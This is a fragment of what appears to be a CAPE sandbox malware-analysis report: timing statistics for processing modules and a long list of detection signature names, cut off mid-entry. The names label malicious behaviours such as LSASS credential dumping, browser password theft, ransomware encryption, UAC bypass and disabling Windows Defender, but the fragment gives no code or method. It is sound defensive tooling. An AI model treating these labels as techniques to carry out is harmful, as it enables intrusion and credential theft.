{ "statistics": { "processing": [ { "name": "CAPE", "time": 2.962 }, { "name": "AnalysisInfo", "time": 0.003 }, { "name": "BehaviorAnalysis", "time": 0.059 }, { "name": "Debug", "time": 0.0 }, { "name": "NetworkAnalysis", "time": 0.0 }, { "name": "Suricata", "time": 0.0 }, { "name": "UrlAnalysis", "time": 0.0 }, { "name": "script_log_processing", "time": 0.0 }, { "name": "ProcessMemory", "time": 0.0 } ], "signatures": [ { "name": "packer_themida", "time": 0.0 }, { "name": "stealth_network", "time": 0.0 }, { "name": "disable_driver_via_blocklist", "time": 0.0 }, { "name": "disable_driver_via_hvcidisallowedimages", "time": 0.0 }, { "name": "disable_hypervisor_protected_code_integrity", "time": 0.0 }, { "name": "pendingfilerenameoperations_Operations", "time": 0.0 }, { "name": "anomalous_deletefile", "time": 0.0 }, { "name": "antiav_360_libs", "time": 0.0 }, { "name": "antiav_ahnlab_libs", "time": 0.0 }, { "name": "antiav_avast_libs", "time": 0.0 }, { "name": "antiav_bitdefender_libs", "time": 0.0 }, { "name": "antiav_bullgaurd_libs", "time": 0.0 }, { "name": "antiav_emsisoft_libs", "time": 0.0 }, { "name": "antiav_qurb_libs", "time": 0.0 }, { "name": "antiav_servicestop", "time": 0.0 }, { "name": "antiav_apioverride_libs", "time": 0.0 }, { "name": "antidebug_guardpages", "time": 0.0 }, { "name": "antiav_nthookengine_libs", "time": 0.0 }, { "name": "antidebug_ntsetinformationthread", "time": 0.0 }, { "name": "antidebug_outputdebugstring", "time": 0.0 }, { "name": "antidebug_windows", "time": 0.0 }, { "name": "antisandbox_cuckoo", "time": 0.0 }, { "name": "antisandbox_cuckoocrash", "time": 0.0 }, { "name": "antisandbox_foregroundwindows", "time": 0.0 }, { "name": "antisandbox_mouse_hook", "time": 0.0 }, { "name": "antisandbox_sboxie_libs", "time": 0.0 }, { "name": "antisandbox_script_timer", "time": 0.0 }, { "name": "antisandbox_sleep", "time": 0.0 }, { "name": "antisandbox_sunbelt_libs", "time": 0.0 }, { "name": "antisandbox_unhook", "time": 0.0 }, { "name": "antivm_directory_objects", "time": 0.0 }, { "name": "antivm_generic_disk", "time": 0.0 }, { "name": "antivm_generic_scsi", "time": 0.0 }, { "name": "antivm_generic_services", "time": 0.0 }, { "name": "antivm_generic_system", "time": 0.0 }, { "name": "antivm_checks_available_memory", "time": 0.0 }, { "name": "detect_virtualization_via_recent_files", "time": 0.0 }, { "name": "antivm_vbox_libs", "time": 0.0 }, { "name": "antivm_vbox_window", "time": 0.0 }, { "name": "antivm_vmware_events", "time": 0.0 }, { "name": "antivm_vmware_libs", "time": 0.0 }, { "name": "api_spamming", "time": 0.0 }, { "name": "api_uuidfromstringa", "time": 0.0 }, { "name": "bcdedit_command", "time": 0.0 }, { "name": "bootkit", "time": 0.0 }, { "name": "potential_overwrite_mbr", "time": 0.0 }, { "name": "suspicious_ioctl_scsipassthough", "time": 0.0 }, { "name": "browser_needed", "time": 0.0 }, { "name": "regsvr32_squiblydoo_dll_load", "time": 0.0 }, { "name": "uac_bypass_cmstp", "time": 0.0 }, { "name": "uac_bypass_eventvwr", "time": 0.0 }, { "name": "uac_bypass_windows_Backup", "time": 0.0 }, { "name": "clickfraud_cookies", "time": 0.0 }, { "name": "dotnet_code_compile", "time": 0.0 }, { "name": "creates_largekey", "time": 0.0 }, { "name": "creates_nullvalue", "time": 0.0 }, { "name": "access_windows_passwords_vault", "time": 0.0 }, { "name": "dump_lsa_via_windows_error_reporting", "time": 0.0 }, { "name": "lsass_credential_dumping", "time": 0.0 }, { "name": "critical_process", "time": 0.0 }, { "name": "cryptopool_domains", "time": 0.0 }, { "name": "dead_connect", "time": 0.0 }, { "name": "dead_link", "time": 0.0 }, { "name": "debugs_self", "time": 0.0 }, { "name": "decoy_document", "time": 0.0 }, { "name": "decoy_image", "time": 0.0 }, { "name": "deletes_consolehost_history", "time": 0.0 }, { "name": "deletes_shadow_copies", "time": 0.0 }, { "name": "deletes_system_state_backup", "time": 0.0 }, { "name": "dep_bypass", "time": 0.0 }, { "name": "dep_disable", "time": 0.0 }, { "name": "disables_mappeddrives_autodisconnect", "time": 0.0 }, { "name": "disables_wfp", "time": 0.0 }, { "name": "add_windows_defender_exclusions", "time": 0.0 }, { "name": "dll_load_uncommon_file_types", "time": 0.0 }, { "name": "document_script_exe_drop", "time": 0.0 }, { "name": "guloader_apis", "time": 0.0 }, { "name": "driver_load", "time": 0.0 }, { "name": "dynamic_function_loading", "time": 0.0 }, { "name": "encrypted_ioc", "time": 0.0 }, { "name": "exec_crash", "time": 0.0 }, { "name": "process_creation_suspicious_location", "time": 0.0 }, { "name": "exploit_getbasekerneladdress", "time": 0.0 }, { "name": "exploit_gethaldispatchtable", "time": 0.0 }, { "name": "exploit_heapspray", "time": 0.0 }, { "name": "koadic_apis", "time": 0.0 }, { "name": "koadic_network_activity", "time": 0.0 }, { "name": "downloads_from_filehosting", "time": 0.0 }, { "name": "generic_phish", "time": 0.0 }, { "name": "http_request", "time": 0.0 }, { "name": "infostealer_browser", "time": 0.0 }, { "name": "infostealer_browser_password", "time": 0.0 }, { "name": "infostealer_cookies", "time": 0.0 }, { "name": "cryptbot_network", "time": 0.0 }, { "name": "infostealer_keylog", "time": 0.0 }, { "name": "purplewave_network_activity", "time": 0.0 }, { "name": "quilclipper_behavior", "time": 0.0 }, { "name": "raccoon_behavior", "time": 0.0 }, { "name": "captures_screenshot", "time": 0.0 }, { "name": "vidar_behavior", "time": 0.0 }, { "name": "injection_createremotethread", "time": 0.0 }, { "name": "injection_explorer", "time": 0.0 }, { "name": "injection_needextension", "time": 0.0 }, { "name": "injection_network_traffic", "time": 0.0 }, { "name": "injection_runpe", "time": 0.0 }, { "name": "injection_rwx", "time": 0.0 }, { "name": "injection_themeinitapihook", "time": 0.0 }, { "name": "resumethread_remote_process", "time": 0.0 }, { "name": "internet_dropper", "time": 0.0 }, { "name": "escalate_privilege_via_named_pipe", "time": 0.0 }, { "name": "ipc_namedpipe", "time": 0.0 }, { "name": "js_phish", "time": 0.0 }, { "name": "js_suspicious_redirect", "time": 0.0 }, { "name": "execute_binary_via_internet_explorer_exporter", "time": 0.0 }, { "name": "execute_binary_via_run_exe_helper_utility", "time": 0.0 }, { "name": "execute_ps_via_syncappvpublishingserver", "time": 0.0 }, { "name": "malicious_dynamic_function_loading", "time": 0.0 }, { "name": "encrypt_pcinfo", "time": 0.0 }, { "name": "encrypt_data_agenttesla_http", "time": 0.0 }, { "name": "encrypt_data_agentteslat2_http", "time": 0.0 }, { "name": "encrypt_data_nanocore", "time": 0.0 }, { "name": "mimics_agent", "time": 0.0 }, { "name": "mimics_filetime", "time": 0.0 }, { "name": "amsi_bypass_via_com_registry", "time": 0.0 }, { "name": "access_auto_logons_via_registry", "time": 0.0 }, { "name": "access_boot_key_via_registry", "time": 0.0 }, { "name": "create_suspicious_lnk_files", "time": 0.0 }, { "name": "credential_access_via_windows_credential_history", "time": 0.0 }, { "name": "dll_hijacking_via_microsoft_exchange", "time": 0.0 }, { "name": "dll_hijacking_via_waas_medic_svc_com_typelib", "time": 0.0 }, { "name": "execute_file_downloaded_via_openssh", "time": 0.0 }, { "name": "execute_safe_mode_from_suspicious_process", "time": 0.0 }, { "name": "execute_scripts_via_microsoft_management_console", "time": 0.0 }, { "name": "execute_suspicious_processes_via_windows_mssql_service", "time": 0.0 }, { "name": "execution_from_self_extracting_archive", "time": 0.0 }, { "name": "ip_address_discovery_via_trusted_program", "time": 0.0 }, { "name": "load_dll_via_control_panel", "time": 0.0 }, { "name": "network_connection_via_suspicious_process", "time": 0.0 }, { "name": "potential_location_discovery_via_unusual_process", "time": 0.0 }, { "name": "store_executable_registry", "time": 0.0 }, { "name": "Suspicious_Execution_Via_MicrosoftExchangeTransportAgent", "time": 0.0 }, { "name": "suspicious_java_execution_via_win_scripts", "time": 0.0 }, { "name": "Suspicious_Scheduled_Task_Creation_Via_Masqueraded_XML_File", "time": 0.0 }, { "name": "uses_restart_manager_for_suspicious_activities", "time": 0.0 }, { "name": "modify_desktop_wallpaper", "time": 0.0 }, { "name": "modify_zoneid_ads", "time": 0.0 }, { "name": "move_file_on_reboot", "time": 0.0 }, { "name": "multiple_useragents", "time": 0.0 }, { "name": "network_anomaly", "time": 0.0 }, { "name": "network_bind", "time": 0.0 }, { "name": "network_cnc_https_archive", "time": 0.0 }, { "name": "network_cnc_https_free_webshoting", "time": 0.0 }, { "name": "network_cnc_https_generic", "time": 0.0 }, { "name": "network_cnc_https_temp_urldns", "time": 0.0 }, { "name": "network_cnc_https_opensource", "time": 0.0 }, { "name": "network_cnc_https_pastesite", "time": 0.0 }, { "name": "network_cnc_https_payload", "time": 0.0 }, { "name": "network_cnc_https_serviceinterface", "time": 0.0 }, { "name": "network_cnc_https_socialmedia", "time": 0.0 }, { "name": "network_cnc_https_telegram", "time": 0.0 }, { "name": "network_cnc_https_tempstorage", "time": 0.0 }, { "name": "network_cnc_https_urlshortener", "time": 0.0 }, { "name": "network_cnc_https_useragent", "time": 0.0 }, { "name": "network_cnc_smtps_exfil", "time": 0.0 }, { "name": "network_cnc_smtps_generic", "time": 0.0 }, { "name": "network_dns_idn", "time": 0.0 }, { "name": "network_dns_suspicious_querytype", "time": 0.0 }, { "name": "network_dns_tunneling_request", "time": 0.0 }, { "name": "network_document_http", "time": 0.0 }, { "name": "explorer_http", "time": 0.0 }, { "name": "network_fake_useragent", "time": 0.0 }, { "name": "legitimate_domain_abuse", "time": 0.0 }, { "name": "network_tor", "time": 0.0 }, { "name": "office_com_load", "time": 0.0 }, { "name": "office_dotnet_load", "time": 0.0 }, { "name": "office_mshtml_load", "time": 0.0 }, { "name": "office_vb_load", "time": 0.0 }, { "name": "office_wmi_load", "time": 0.0 }, { "name": "office_cve2017_11882", "time": 0.0 }, { "name": "office_cve2017_11882_network", "time": 0.0 }, { "name": "office_cve_2021_40444", "time": 0.0 }, { "name": "office_cve_2021_40444_m2", "time": 0.0 }, { "name": "office_flash_load", "time": 0.0 }, { "name": "office_postscript", "time": 0.0 }, { "name": "office_suspicious_processes", "time": 0.0 }, { "name": "office_write_exe", "time": 0.0 }, { "name": "persistence_via_autodial_dll_registry", "time": 0.0 }, { "name": "persistence_autorun", "time": 0.0 }, { "name": "persistence_autorun_tasks", "time": 0.0 }, { "name": "persistence_bootexecute", "time": 0.0 }, { "name": "persistence_registry_script", "time": 0.0 }, { "name": "powershell_network_connection", "time": 0.0 }, { "name": "powershell_download", "time": 0.0 }, { "name": "powershell_request", "time": 0.0 }, { "name": "createtoolhelp32snapshot_module_enumeration", "time": 0.0 }, { "name": "enumerates_running_processes", "time": 0.0 }, { "name": "process_interest", "time": 0.0 }, { "name": "process_needed", "time": 0.0 }, { "name": "mass_data_encryption", "time": 0.0 }, { "name": "ransomware_file_modifications", "time": 0.0 }, { "name": "nemty_network_activity", "time": 0.0 }, { "name": "nemty_note", "time": 0.0 }, { "name": "sodinokibi_behavior", "time": 0.0 }, { "name": "stop_ransomware_registry", "time": 0.0 }, { "name": "blackrat_apis", "time": 0.0 }, { "name": "blackrat_network_activity", "time": 0.0 }, { "name": "blackrat_registry_keys", "time": 0.0 }, { "name": "dcrat_behavior", "time": 0.0 }, { "name": "karagany_system_event_objects", "time": 0.0 }, { "name": "rat_luminosity", "time": 0.0 }, { "name": "rat_nanocore", "time": 0.0 }, { "name": "netwire_behavior", "time": 0.0 }, { "name": "obliquerat_network_activity", "time": 0.0 }, { "name": "orcusrat_behavior", "time": 0.0 }, { "name": "trochilusrat_apis", "time": 0.0 }, { "name": "reads_self", "time": 0.0 }, { "name": "recon_beacon", "time": 0.0 }, { "name": "recon_programs", "time": 0.0 }, { "name": "recon_systeminfo", "time": 0.0 }, { "name": "accesses_recyclebin", "time": 0.0 }, { "name": "remcos_shell_code_dynamic_wrapper_x", "time": 0.0 }, { "name": "script_created_process", "time": 0.0 }, { "name": "script_network_activity", "time": 0.0 }, { "name": "suspicious_js_script", "time": 0.0 }, { "name": "javascript_timer", "time": 0.0 }, { "name": "secure_login_phishing", "time": 0.0 }, { "name": "securityxploded_modules", "time": 0.0 }, { "name": "get_clipboard_data", "time": 0.0 }, { "name": "sets_autoconfig_url", "time": 0.0 }, { "name": "spoofs_procname", "time": 0.0 }, { "name": "stack_pivot", "time": 0.0 }, { "name": "stack_pivot_file_created", "time": 0.0 }, { "name": "stack_pivot_process_create", "time": 0.0 }, { "name": "set_clipboard_data", "time": 0.0 }, { "name": "stealth_childproc", "time": 0.0 }, { "name": "stealth_file", "time": 0.0 }, { "name": "stealth_system_procname", "time": 0.0 }, { "name": "stealth_timeout", "time": 0.0 }, { "name": "stealth_window", "time": 0.0 }, { "name": "queries_keyboard_layout", "time": 0.0 }, { "name": "terminates_remote_process", "time": 0.0 }, { "name": "user_enum", "time": 0.0 }, { "name": "virus", "time": 0.0 }, { "name": "neshta_files", "time": 0.0 }, { "name": "neshta_regkeys", "time": 0.0 }, { "name": "webmail_phish", "time": 0.0 }, { "name": "persists_dev_util", "time": 0.0 }, { "name": "spawns_dev_util", "time": 0.0 }, { "name": "alters_windows_utility", "time": 0.0 }, { "name": "overwrites_accessibility_utility", "time": 0.0 }, { "name": "Potential_Lateral_Movement_Via_SMBEXEC", "time": 0.0 }, { "name": "potential_WebShell_Via_ScreenConnectServer", "time": 0.0 }, { "name": "uses_Microsoft_HTML_Help_Executable", "time": 0.0 }, { "name": "wiper_zeroedbytes", "time": 0.0 }, { "name": "wmi_create_process", "time": 0.0 }, { "name": "wmi_script_process", "time": 0.0 }, { "name": "deletes_files", "time": 0.0 }, { "name": "drops_files", "time": 0.0 }, { "name": "reads_files", "time": 0.0 }, { "name": "writes_files", "time": 0.0 }, { "name": "antianalysis_tls_section", "time": 0.0 }, { "name": "antivirus_clamav", "time": 0.0 }, { "name": "antivirus_virustotal", "time": 0.0 }, { "name": "bad_certs", "time": 0.0 }, { "name": "bad_ssl_certs", "time": 0.0 }, { "name": "banker_zeus_p2p", "time": 0.0 }, { "name": "banker_zeus_url", "time": 0.0 }, { "name": "binary_yara", "time": 0.0 }, { "name": "bot_athenahttp", "time": 0.0 }, { "name": "bot_dirtjumper", "time": 0.0 }, { "name": "bot_drive", "time": 0.0 }, { "name": "bot_drive2", "time": 0.0 }, { "name": "bot_madness", "time": 0.0 }, { "name": "family_proxyback", "time": 0.0 }, { "name": "flare_capa_antianalysis", "time": 0.0 }, { "name": "flare_capa_collection", "time": 0.0 }, { "name": "flare_capa_communication", "time": 0.0 }, { "name": "flare_capa_compiler", "time": 0.0 }, { "name": "flare_capa_datamanipulation", "time": 0.0 }, { "name": "flare_capa_executable", "time": 0.0 }, { "name": "flare_capa_hostinteraction", "time": 0.0 }, { "name": "flare_capa_impact", "time": 0.0 }, { "name": "flare_capa_lib", "time": 0.0 }, { "name": "flare_capa_linking", "time": 0.0 }, { "name": "flare_capa_loadcode", "time": 0.0 }, { "name": "flare_capa_malwarefamily", "time": 0.0 }, { "name": "flare_capa_nursery", "time": 0.0 }, { "name": "flare_capa_persistence", "time": 0.0 }, { "name": "flare_capa_runtime", "time": 0.0 }, { "name": "flare_capa_targeting", "time": 0.0 }, { "name": "log4shell", "time": 0.0 }, { "name": "mimics_extension", "time": 0.0 }, { "name": "network_country_distribution", "time": 0.0 }, { "name": "network_cnc_http", "time": 0.0 }, { "name": "network_ip_exe", "time": 0.0 }, { "name": "network_dga", "time": 0.0 }, { "name": "network_dga_fraunhofer", "time": 0.0 }, { "name": "network_dyndns", "time": 0.0 }, { "name": "network_excessive_udp", "time": 0.0 }, { "name": "network_http", "time": 0.0 }, { "name": "network_icmp", "time": 0.0 }, { "name": "network_irc", "time": 0.0 }, { "name": "network_open_proxy", "time": 0.0 }, { "name": "network_questionable_http_path", "time": 0.0 }, { "name": "network_questionable_https_path", "time": 0.0 }, { "name": "network_smtp", "time": 0.0 }, { "name": "network_torgateway", "time": 0.0 }, { "name": "origin_langid", "time": 0.0 }, { "name": "origin_resource_langid", "time": 0.0 }, { "name": "overlay", "time": 0.0 }, { "name": "packer_unknown_pe_section_name", "time": 0.0 }, { "name": "packer_aspack", "time": 0.0 }, { "name": "packer_aspirecrypt", "time": 0.0 }, { "name": "packer_bedsprotector", "time": 0.0 }, { "name": "packer_confuser", "time": 0.0 }, { "name": "packer_enigma", "time": 0.0 }, { "name": "packer_entropy", "time": 0.0 }, { "name": "packer_mpress", "time": 0.0 }, { "name": "packer_nate", "time": 0.0 }, { "name": "packer_nspack", "time": 0.0 }, { "name": "packer_smartassembly", "time": 0.0 }, { "name": "packer_spices", "time": 0.0 }, { "name": "packer_themida", "time": 0.0 }, { "name": "packer_titan", "time": 0.0 }, { "name": "packer_upx", "time": 0.0 }, { "name": "packer_vmprotect", "time": 0.0 }, { "name": "packer_yoda", "time": 0.0 }, { "name": "pdf_annot_urls_checker", "time": 0.0 }, { "name": "polymorphic", "time": 0.0 }, { "name": "punch_plus_plus_pcres", "time": 0.0 }, { "name": "procmem_yara", "time": 0.0 }, { "name": "recon_checkip", "time": 0.0 }, { "name": "static_authenticode", "time": 0.0 }, { "name": "invalid_authenticode_signature", "time": 0.0 }, { "name": "static_dotnet_anomaly", "time": 0.0 }, { "name": "static_java", "time": 0.0 }, { "name": "static_pdf", "time": 0.0 }, { "name": "static_pe_anomaly", "time": 0.0 }, { "name": "pe_compile_timestomping", "time": 0.0 }, { "name": "static_pe_pdbpath", "time": 0.0 }, { "name": "static_rat_config", "time": 0.0 }, { "name": "static_versioninfo_anomaly", "time": 0.0 }, { "name": "suricata_alert", "time": 0.0 }, { "name": "suspicious_html_body", "time": 0.0 }, { "name": "suspicious_html_name", "time": 0.0 }, { "name": "suspicious_html_title", "time": 0.0 }, { "name": "volatility_devicetree_1", "time": 0.0 }, { "name": "volatility_handles_1", "time": 0.0 }, { "name": "volatility_ldrmodules_1", "time": 0.0 }, { "name": "volatility_ldrmodules_2", "time": 0.0 }, { "name": "volatility_malfind_1", "time": 0.0 }, { "name": "volatility_malfind_2", "time": 0.0 }, { "name": "volatility_modscan_1", "time": 0.0 }, { "name": "volatility_svcscan_1", "time": 0.0 }, { "name": "volatility_svcscan_2", "time": 0.0 }, { "name": "volatility_svcscan_3", "time": 0.0 }, { "name": "whois_create", "time": 0.0 }, { "name": "accesses_mailslot", "time": 0.0 }, { "name": "accesses_netlogon_regkey", "time": 0.0 }, { "name": "accesses_public_folder", "time": 0.0 }, { "name": "accesses_sysvol", "time": 0.0 }, { "name": "writes_sysvol", "time": 0.0 }, { "name": "adds_admin_user", "time": 0.0 }, { "name": "adds_user", "time": 0.0 }, { "name": "overwrites_admin_password", "time": 0.0 }, { "name": "antianalysis_detectfile", "time": 0.001 }, { "name": "antianalysis_detectreg", "time": 0.005 }, { "name": "modify_attachment_manager", "time": 0.0 }, { "name": "antiav_detectfile", "time": 0.001 }, { "name": "antiav_detectreg", "time": 0.026 }, { "name": "antiav_srp", "time": 0.0 }, { "name": "antiav_whitespace", "time": 0.0 }, { "name": "antidebug_devices", "time": 0.0 }, { "name": "antiemu_windefend", "time": 0.0 }, { "name": "antiemu_wine_reg", "time": 0.0 }, { "name": "antisandbox_cuckoo_files", "time": 0.0 }, { "name": "antisandbox_fortinet_files", "time": 0.0 }, { "name": "antisandbox_joe_anubis_files", "time": 0.0 }, { "name": "antisandbox_sboxie_mutex", "time": 0.0 }, { "name": "antisandbox_sunbelt_files", "time": 0.0 }, { "name": "antisandbox_threattrack_files", "time": 0.0 }, { "name": "antivm_bochs_keys", "time": 0.001 }, { "name": "antivm_generic_bios", "time": 0.0 }, { "name": "antivm_generic_diskreg", "time": 0.001 }, { "name": "antivm_hyperv_keys", "time": 0.0 }, { "name": "antivm_parallels_keys", "time": 0.001 }, { "name": "antivm_vbox_devices", "time": 0.0 }, { "name": "antivm_vbox_files", "time": 0.001 }, { "name": "antivm_vbox_keys", "time": 0.003 }, { "name": "antivm_vmware_devices", "time": 0.0 }, { "name": "antivm_vmware_files", "time": 0.0 }, { "name": "antivm_vmware_keys", "time": 0.002 }, { "name": "antivm_vmware_mutexes", "time": 0.0 }, { "name": "antivm_vpc_files", "time": 0.0 }, { "name": "antivm_vpc_keys", "time": 0.001 }, { "name": "antivm_vpc_mutex", "time": 0.0 }, { "name": "antivm_xen_keys", "time": 0.001 }, { "name": "asyncrat_mutex", "time": 0.0 }, { "name": "gulpix_behavior", "time": 0.0 }, { "name": "ketrican_regkeys", "time": 0.0 }, { "name": "okrum_mutexes", "time": 0.0 }, { "name": "banker_cridex", "time": 0.0 }, { "name": "geodo_banking_trojan", "time": 0.001 }, { "name": "banker_spyeye_mutexes", "time": 0.0 }, { "name": "banker_zeus_mutex", "time": 0.0 }, { "name": "bitcoin_opencl", "time": 0.0 }, { "name": "accesses_primary_patition", "time": 0.0 }, { "name": "direct_hdd_access", "time": 0.0 }, { "name": "enumerates_physical_drives", "time": 0.0 }, { "name": "physical_drive_access", "time": 0.0 }, { "name": "bot_russkill", "time": 0.0 }, { "name": "browser_addon", "time": 0.0 }, { "name": "chromium_browser_extension_directory", "time": 0.0 }, { "name": "browser_helper_object", "time": 0.0 }, { "name": "browser_security", "time": 0.0 }, { "name": "browser_startpage", "time": 0.0 }, { "name": "ie_disables_process_tab", "time": 0.0 }, { "name": "odbcconf_bypass", "time": 0.0 }, { "name": "squiblydoo_bypass", "time": 0.0 }, { "name": "squiblytwo_bypass", "time": 0.0 }, { "name": "bypass_firewall", "time": 0.0 }, { "name": "checks_uac_status", "time": 0.0 }, { "name": "uac_bypass_cmstpcom", "time": 0.0 }, { "name": "uac_bypass_delegateexecute_sdclt", "time": 0.0 }, { "name": "uac_bypass_fodhelper", "time": 0.0 }, { "name": "cape_extracted_content", "time": 0.0 }, { "name": "carberp_mutex", "time": 0.0 }, { "name": "clears_logs", "time": 0.0 }, { "name": "cmdline_obfuscation", "time": 0.0 }, { "name": "cmdline_switches", "time": 0.0 }, { "name": "cmdline_terminate", "time": 0.0 }, { "name": "cmdline_forfiles_wildcard", "time": 0.0 }, { "name": "cmdline_http_link", "time": 0.0 }, { "name": "cmdline_long_string", "time": 0.0 }, { "name": "cmdline_reversed_http_link", "time": 0.0 }, { "name": "long_commandline", "time": 0.0 }, { "name": "powershell_renamed_commandline", "time": 0.0 }, { "name": "copies_self", "time": 0.0 }, { "name": "credwiz_credentialaccess", "time": 0.0 }, { "name": "enables_wdigest", "time": 0.0 }, { "name": "vaultcmd_credentialaccess", "time": 0.0 }, { "name": "file_credential_store_access", "time": 0.0 }, { "name": "file_credential_store_write", "time": 0.0 }, { "name": "kerberos_credential_access_via_rubeus", "time": 0.0 }, { "name": "registry_credential_dumping", "time": 0.0 }, { "name": "registry_credential_store_access", "time": 0.0 }, { "name": "registry_lsa_secrets_access", "time": 0.0 }, { "name": "comsvcs_credentialdump", "time": 0.0 }, { "name": "cryptomining_stratum_command", "time": 0.0 }, { "name": "cypherit_mutexes", "time": 0.0 }, { "name": "darkcomet_regkeys", "time": 0.0 }, { "name": "datop_loader", "time": 0.0 }, { "name": "deepfreeze_mutex", "time": 0.0 }, { "name": "deletes_executed_files", "time": 0.0 }, { "name": "disables_app_launch", "time": 0.0 }, { "name": "disables_auto_app_termination", "time": 0.0 }, { "name": "disables_appv_virtualization", "time": 0.0 }, { "name": "disables_backups", "time": 0.0 }, { "name": "disables_browser_warn", "time": 0.0 }, { "name": "disables_context_menus", "time": 0.0 }, { "name": "disables_cpl_disable", "time": 0.0 }, { "name": "disables_crashdumps", "time": 0.0 }, { "name": "disables_event_logging", "time": 0.0 }, { "name": "disables_folder_options", "time": 0.0 }, { "name": "disables_notificationcenter", "time": 0.0 }, { "name": "disables_power_options", "time": 0.0 }, { "name": "disables_restore_default_state", "time": 0.0 }, { "name": "disables_run_command", "time": 0.0 }, { "name": "disables_smartscreen", "time": 0.0 }, { "name": "disables_startmenu_search", "time": 0.0 }, { "name": "disables_system_restore", "time": 0.0 }, { "name": "disables_uac", "time": 0.0 }, { "name": "disables_wer", "time": 0.0 }, { "name": "disables_windows_defender", "time": 0.0 }, { "name": "disables_windows_defender_logging", "time": 0.0 }, { "name": "removes_windows_defender_contextmenu", "time": 0.0 }, { "name": "windows_defender_powershell", "time": 0.0 }, { "name": "disables_windows_file_protection", "time": 0.0 }, { "name": "disables_windowsupdate", "time": 0.0 }, { "name": "disables_winfirewall", "time": 0.0 }, { "name": "adfind_domain_enumeration", "time": 0.0 }, { "name": "domain_enumeration_commands", "time": 0.0 }, { "name": "andromut_mutexes", "time": 0.0 }, { "name": "downloader_cabby", "time": 0.0 }, { "name": "phorpiex_mutexes", "time": 0.0 }, { "name": "protonbot_mutexes", "time": 0.0 }, { "name": "driver_filtermanager", "time": 0.0 }, { "name": "dropper", "time": 0.0 }, { "name": "dll_archive_execution", "time": 0.0 }, { "name": "lnk_archive_execution", "time": 0.0 }, { "name": "script_archive_execution", "time": 0.0 }, { "name": "excel4_macro_urls", "time": 0.0 }, { "name": "escalate_privilege_via_ntlm_relay", "time": 0.0 }, { "name": "spooler_access", "time": 0.0 }, { "name": "spooler_svc_start", "time": 0.0 }, { "name": "mapped_drives_uac", "time": 0.0 }, { "name": "hides_recycle_bin_icon", "time": 0.0 }, { "name": "apocalypse_stealer_file_behavior", "time": 0.0 }, { "name": "arkei_files", "time": 0.0 }, { "name": "azorult_mutexes", "time": 0.0 }, { "name": "infostealer_bitcoin", "time": 0.001 }, { "name": "cryptbot_files", "time": 0.0 }, { "name": "echelon_files", "time": 0.0 }, { "name": "infostealer_ftp", "time": 0.009 }, { "name": "infostealer_im", "time": 0.006 }, { "name": "infostealer_mail", "time": 0.002 }, { "name": "masslogger_files", "time": 0.0 }, { "name": "poullight_files", "time": 0.0 }, { "name": "purplewave_mutexes", "time": 0.0 }, { "name": "quilclipper_mutexes", "time": 0.0 }, { "name": "qulab_files", "time": 0.0 }, { "name": "qulab_mutexes", "time": 0.0 }, { "name": "asyncrat_mutex", "time": 0.0 }, { "name": "Evade_Execution_Via_ASPNet_Compiler", "time": 0.0 }, { "name": "Evade_Execute_Via_DeviceCredentialDeployment", "time": 0.0 }, { "name": "Evade_Execution_Via_Filter_Manager_Control", "time": 0.0 }, { "name": "Evade_Execution_Via_Intel_GFXDownloadWrapper", "time": 0.0 }, { "name": "execute_binary_via_appvlp", "time": 0.0 }, { "name": "execute_binary_via_pcalua", "time": 0.0 }, { "name": "Execute_Binary_Via_OpenSSH", "time": 0.0 }, { "name": "execute_binary_via_pcalua", "time": 0.0 }, { "name": "Execute_Binary_Via_PesterPSModule", "time": 0.0 }, { "name": "Execute_Binary_Via_ScriptRunner", "time": 0.0 }, { "name": "execute_binary_via_ttdinject", "time": 0.0 }, { "name": "Execute_Binary_Via_VisualStudioLiveShare", "time": 0.0 }, { "name": "Execute_Msiexec_Via_Explorer", "time": 0.0 }, { "name": "execute_remote_msi", "time": 0.0 }, { "name": "execute_suspicious_powershell_via_runscripthelper", "time": 0.0 }, { "name": "execute_suspicious_powershell_via_sqlps", "time": 0.0 }, { "name": "Indirect_Command_Execution_Via_ConsoleWindowHost", "time": 0.0 }, { "name": "Perform_Malicious_Activities_Via_Headless_Browser", "time": 0.0 }, { "name": "Register_DLL_Via_CertOC", "time": 0.0 }, { "name": "Register_DLL_Via_MSIEXEC", "time": 0.0 }, { "name": "Register_DLL_Via_Odbcconf", "time": 0.0 }, { "name": "Scriptlet_Proxy_Execution_Via_Pubprn", "time": 0.0 }, { "name": "ie_martian_children", "time": 0.0 }, { "name": "office_martian_children", "time": 0.0 }, { "name": "mimics_icon", "time": 0.0 }, { "name": "masquerade_process_name", "time": 0.001 }, { "name": "mimikatz_modules", "time": 0.0 }, { "name": "ms_office_cmd_rce", "time": 0.0 }, { "name": "mount_copy_to_webdav_share", "time": 0.0 }, { "name": "potential_protocol_tunneling_via_legit_utilities", "time": 0.0 }, { "name": "potential_protocol_tunneling_via_qemu", "time": 0.0 }, { "name": "suspicious_execution_via_dotnet_remoting", "time": 0.0 }, { "name": "modify_certs", "time": 0.0 }, { "name": "dotnet_clr_usagelog_regkeys", "time": 0.0 }, { "name": "modify_hostfile", "time": 0.0 }, { "name": "modify_oem_information", "time": 0.0 }, { "name": "modify_security_center_warnings", "time": 0.0 }, { "name": "modify_uac_prompt", "time": 0.0 }, { "name": "network_dns_blockchain", "time": 0.0 }, { "name": "network_dns_opennic", "time": 0.0 }, { "name": "network_dns_paste_site", "time": 0.0 }, { "name": "network_dns_reverse_proxy", "time": 0.0 }, { "name": "network_dns_temp_file_storage", "time": 0.0 }, { "name": "network_dns_temp_urldns", "time": 0.0 }, { "name": "network_dns_url_shortener", "time": 0.0 }, { "name": "network_dns_doh_tls", "time": 0.0 }, { "name": "suspicious_tld", "time": 0.0 }, { "name": "network_tor_service", "time": 0.0 }, { "name": "office_code_page", "time": 0.0 }, { "name": "office_addinloading", "time": 0.0 }, { "name": "office_perfkey", "time": 0.0 }, { "name": "office_macro", "time": 0.0 }, { "name": "changes_trust_center_settings", "time": 0.0 }, { "name": "disables_vba_trust_access", "time": 0.0 }, { "name": "office_macro_autoexecution", "time": 0.0 }, { "name": "office_macro_ioc", "time": 0.0 }, { "name": "office_macro_malicious_prediction", "time": 0.0 }, { "name": "office_macro_suspicious", "time": 0.0 }, { "name": "rtf_aslr_bypass", "time": 0.0 }, { "name": "rtf_anomaly_characterset", "time": 0.0 }, { "name": "rtf_anomaly_version", "time": 0.0 }, { "name": "rtf_embedded_content", "time": 0.0 }, { "name": "rtf_embedded_office_file", "time": 0.0 }, { "name": "rtf_exploit_static", "time": 0.0 }, { "name": "office_security", "time": 0.0 }, { "name": "office_anomalous_feature", "time": 0.0 }, { "name": "office_dde_command", "time": 0.0 }, { "name": 